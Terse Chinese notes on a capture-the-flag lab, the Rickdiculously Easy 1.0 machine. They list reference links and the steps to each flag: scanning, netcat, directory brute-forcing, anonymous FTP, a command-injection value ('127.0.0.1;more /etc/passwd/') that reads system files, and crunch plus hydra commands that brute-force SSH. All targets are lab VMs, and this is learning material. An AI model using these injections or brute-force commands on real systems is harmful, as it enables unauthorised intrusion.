准备:
kali攻击
vbox导入靶场
nc工具使用(netcap) - 上行 - 博客园 (cnblogs.com)
(32条消息) netcat(NC)学习笔记-nc命令基础解释以及基础使用--包含使用nc获取shell_铁锤2号的博客-优快云博客
vm导入靶机失败记录
使用vbox,将文件后缀修改成vbox 新建导入现有磁盘 成功导入
相关渗透思路链接:
(31条消息) CTF夺旗训练课程_靶场夺旗_taozijun的博客-优快云博客
(31条消息) 找不到靶机的IP怎么办,教你几步就会了_靶机ip_泣血花的博客-优快云博客
(31条消息) CTF练习:靶场夺旗_ctf靶场夺旗_CNwanku的博客-优快云博客
(31条消息) 靶场夺旗_^BonnenuIt的博客-优快云博客
CTF挑战130分 Rickdiculously 1.0_网易订阅 (163.com)
渗透步骤:
发现靶场
使用arp-scan扫描发现靶场(vbox导入后带pcs 有这个标识就是靶机)
网上讲解 使用nmap扫描也可以发现靶机(?)
发现端口
使用nmap扫描靶机开放端口
使用nc扫描端口(更全面)
对网址端口进行访问
扫描使用dirb隐藏目录
flag1:
nc 192.168.109.149 13337
nc 靶机地址 端口
表示
flag2:
nc 192.168.1.106 60000
flag3:
在浏览器地址栏输入网址的9090端口
flag4:
由于开放ftp服务
在本机输入ftp:\\192.168.109.149进行ftp匿名访问
flag5:
根据80的隐藏目录扫描结果得到隐藏目录,在地址栏输入隐藏目录地址
打开第二个password.html没有发现密码,打开页面源代码发现一个密码隐藏在这
根据隐藏目录robots.txt文件发现目录下有一个留言板并有sql注入存在
根据提示输入地址
通过尝试发现可以使用
127.0.0.1;more /etc/passwd/
可以查看用户名和密码
flag6:
根据上面的收集结果得到用户名和密码尝试ssh端口连接 成功登陆Summer用户
flag7:
复制用户下的文件到已经可以登陆的Summer用户下进行查看,用xftp进行连接下载
flag8:
复制RickSanchez用户下的文件到已经可以登陆的Summer用户下进行查看
(32条消息) 密码字典生成工具:crunch_密码字典生成器_会测试的鲸鱼的博客-优快云博客
(32条消息) crunch 使用教程-随心所欲生成字典_crunch生成字典_hyled-Ava的博客-优快云博客
crunch 密码字典生成工具参考文档
crunch 5 5 -t ,%The > rick.txt
crunch 7 7 -t ,%Flesh >> rick.txt
crunch 10 10 -t ,%Curtains >> rick.txt
hydra -l RickSanchez -P rick.txt -t 4 ssh://192.168.1.107:22222
flag9:
通过破出来的密码进行连接用户,成功登陆